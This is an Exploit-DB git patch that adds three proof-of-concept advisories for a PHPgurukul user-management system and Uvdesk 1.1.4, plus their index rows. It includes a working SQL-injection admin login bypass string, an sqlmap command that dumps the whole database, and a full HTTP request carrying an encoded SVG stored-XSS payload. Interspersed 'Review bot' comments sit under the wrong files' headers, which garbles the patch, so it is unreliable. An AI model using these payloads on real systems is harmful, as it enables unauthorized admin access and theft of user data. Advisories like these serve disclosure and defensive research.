From fe2c42ff0efb324bf62eb2066df059ab5399c08d Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Fri, 25 Aug 2023 00:16:28 +0000
Subject: [PATCH] DB: 2023-08-25

4 changes to exploits/shellcodes/ghdb

User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
Uvdesk 1.1.4 - Stored XSS (Authenticated)
---
 exploits/php/webapps/51694.txt | 33 ++++++++
 exploits/php/webapps/51695.txt | 39 +++++++++
 exploits/php/webapps/51696.txt | 140 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 215 insertions(+)
 create mode 100644 exploits/php/webapps/51694.txt
 create mode 100644 exploits/php/webapps/51695.txt
 create mode 100644 exploits/php/webapps/51696.txt

diff --git a/exploits/php/webapps/51694.txt b/exploits/php/webapps/51694.txt
new file mode 100644
index 000000000..66cfe3255
--- /dev/null
+++ b/exploits/php/webapps/51694.txt
@@ -0,0 +1,33 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Description
+
+User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem.
+2. Enter in one of the
+fields (first name, last name, email, or contact).
+3. Click sign up.
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin.
+2. After login successfully go to manage user page.
+3. Payload
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath
\ No newline at end of file
diff --git a/exploits/php/webapps/51695.txt b/exploits/php/webapps/51695.txt
new file mode 100644
index 000000000..ec64e77a1
--- /dev/null
+++ b/exploits/php/webapps/51695.txt
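Review bot: Step 2 of the user-side PoC reads `Enter in one of the fields`, so the committed advisory never shows what value was injected, and the admin-side step 3 is the bare word `Payload`; if the markup was stripped when the file was rendered, the injected string should be re-added as escaped plain text so the advisory stands on its own. The Description does name the affected parameters (fname, lname, email, contact) and the sink (the manage user page), which is the part defenders need, but no remediation is stated; a closing line such as `Fix: HTML-encode these fields on output (htmlspecialchars) and validate them on input` would make the entry actionable. `field name` in the Description should read `fields`, and the Description's `With admin panel 3.0` does not match the title's `v3.0`.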
@@ -0,0 +1,39 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link:
+https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Proof Of Concept:
+
+1. Navigate to the admin login page.
+
+URL: http://192.168.1.5/loginsystem/admin/
+
+2. Enter "*admin' -- -*" in the admin username field and anything
+random in the password field.
+
+3. Now you successfully logged in as admin.
+
+4. To download all the data from the database, use the below commands.
+
+ 4.1. Login to the admin portal and capture the request.
+
+ 4.2. Copy the intercepted request in a file.
+
+ 4.3. Now use the below command to dump all the data
+
+
+Command: sqlmap -r -p username -D loginsystem --dump-all
+
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath
\ No newline at end of file
diff --git a/exploits/php/webapps/51696.txt b/exploits/php/webapps/51696.txt
new file mode 100644
index 000000000..e1ddc0f22
--- /dev/null
+++ b/exploits/php/webapps/51696.txt
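Review bot: Unlike the sibling 51694.txt, this advisory has no Description section, so it never states the root cause: the PoC shows the admin username field altering the outcome of the login query, but the vulnerable script and the query it builds are not named, which leaves defenders unable to map the finding to code. A short Description before `Proof Of Concept:` saying that the admin login handler appears to concatenate the username parameter into its SQL query (inferred from the PoC, to be confirmed against the source) together with the remediation `Fix: use prepared statements with bound parameters for the login query` would close that gap. The `# Software Link:` header value has wrapped onto the following line, unlike in 51694.txt, and `Now you successfully logged in as admin` should read `You are now logged in as admin`.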
@@ -0,0 +1,140 @@
+# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)
+# Date: 14/08/2023
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://www.uvdesk.com/
+# Software Link: https://github.com/MegaTKC/AeroCMS
+# Version: 1.1.4
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.
+
+## Example XSS Stored in new ticket
+
+-----------------------------------------------------------------------------------------------------------------------
+Param: reply
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 812
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
+Connection: close
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="threadType"
+
+forward
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="status"
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="subject"
+
+aaaa
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="to[]"
+
+test@local.host
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="reply"
+
+%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="pic"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="nextView"
+
+stay
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk--
+
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 302 Found
+Date: Mon, 14 Aug 2023 11:33:26 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Location: /uvdesk/public/en/member/ticket/view/1
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: bf1b73
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:33:26 GMT
+Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 398
+
+
+
+
+
+
+
+
+ Redirecting to /uvdesk/public/en/member/ticket/view/1
+
+
+ Redirecting to /uvdesk/public/en/member/ticket/view/1.
+
+
+-----------------------------------------------------------------------------------------------------------------------
+Redirect and view response:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Mon, 14 Aug 2023 11:44:14 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: 254ce8
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:44:14 GMT
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 300607
+
+
+
+ #1 vvvvvvvvvvvvvvvvvvvvv
+[...]
+
+[...]
+-----------------------------------------------------------------------------------------------------------------------
+
+XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50cb6ca19..8080c8994 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
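Review bot: The header `# Software Link: https://github.com/MegaTKC/AeroCMS` points at a different project than the `# Vendor Homepage: https://www.uvdesk.com/` line above it, and the `# Testeted on:` line cites Apache/2.4.48 and PHP/7.4.23 while both captured responses report `Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29`; the software link should point at the Uvdesk project's own source and the tested-on line should match the versions actually observed (with `Testeted`, `privilages` and `sesssion` corrected). The captured request still carries the author's `PHPSESSID` cookie value, which should be redacted before publication, and the responses carry `X-Debug-Token`/`X-Debug-Token-Link` headers referencing `/_profiler/`, which suggests the test instance ran with the framework profiler enabled and is worth stating so readers do not take that for a default deployment. No remediation is given: the `reply` parameter accepts raw HTML including an `<embed>` with a `data:image/svg+xml` source, so the advisory should recommend server-side sanitisation of the reply body against an allow-list of tags and attributes, with a Content-Security-Policy as defence in depth.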
@@ -31333,6 +31333,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,,2020-12-03,2020-12-07,0,,,,,,
 49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
 48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
+51695,exploits/php/webapps/51695.txt,"User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
+51694,exploits/php/webapps/51694.txt,"User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
 48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,,2020-10-20,2020-10-20,0,,,,,,
 19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php,,2012-06-15,2012-06-15,1,OSVDB-83162;OSVDB-82970;OSVDB-82969;OSVDB-82968,,,http://www.exploit-db.com/screenshots/idlt19500/2.png,,
 7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-51232;CVE-2008-5863,,,,,
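Review bot: The two new descriptions write the version as `v3.0` while the neighbouring rows for the same product (49180, 49052, 48932, 48914) use a bare `2.1`, and in the next hunk the new `Uvdesk 1.1.4` row sits beside `Uvdesk v1.1.3`, so the description column now mixes both notations within one product, which hurts sorting and searching by description. Index entries should follow one convention per product, e.g. `"User Registration & Login and User Management System 3.0 - SQL Injection (Unauthenticated)"`, or the advisory titles should be adjusted to match since the index mirrors them. The `codes` column is empty for all three new rows while 51694.txt and 51695.txt state `CVE : Requested`, so a follow-up to backfill the identifier once assigned is implied.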
@@ -31348,6 +31350,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
+51696,exploits/php/webapps/51696.txt,"Uvdesk 1.1.4 - Stored XSS (Authenticated)",2023-08-24,"Hubert Wojciechowski",webapps,php,,2023-08-24,2023-08-24,0,,,,,,
 51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info